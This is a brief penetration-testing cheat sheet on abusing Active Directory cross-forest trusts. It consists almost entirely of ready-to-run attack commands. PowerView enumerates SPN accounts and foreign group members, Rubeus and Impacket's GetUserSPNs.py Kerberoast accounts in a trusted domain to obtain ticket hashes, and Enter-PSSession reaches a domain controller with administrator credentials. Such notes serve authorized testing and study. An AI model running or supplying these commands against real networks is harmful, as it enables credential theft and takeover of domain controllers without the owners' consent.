Cross-Forest Trust Abuse

Windows

Cross-Forest Kerberoasting

# Enumerating Accounts for Associated SPNs Using PowerView
Get-DomainUser -SPN -Domain DOMAIN.LOCAL | select SamAccountName

# Enumerating the Account if we find any using above command
Get-DomainUser -Domain DOMAIN.LOCAL -Identity username |select samaccountname,memberof

# Performing a Kerberoasting Attacking with Rubeus Using /domain Flag
.\Rubeus.exe kerberoast /domain:DOMAIN.LOCAL /user:user /nowrap

Admin Password Re-Use & Group Membership

# enumerate groups with users that do not belong to the domain using PowerView
Get-DomainForeignGroupMember -Domain DOMAIN.LOCAL

# Accessing DC Using Enter-PSSession
Enter-PSSession -ComputerName DC03.DOMAIN.LOCAL -Credential DOMAIN\administrator

Linux

Cross-Forest Kerberoasting

# Using GetUserSPNs.py
GetUserSPNs.py -target-domain DOMAIN.LOCAL DOMAIN/user

# getting hash
GetUserSPNs.py -request -target-domain DOMAIN.LOCAL DOMAIN.LOCAL/user

Last updated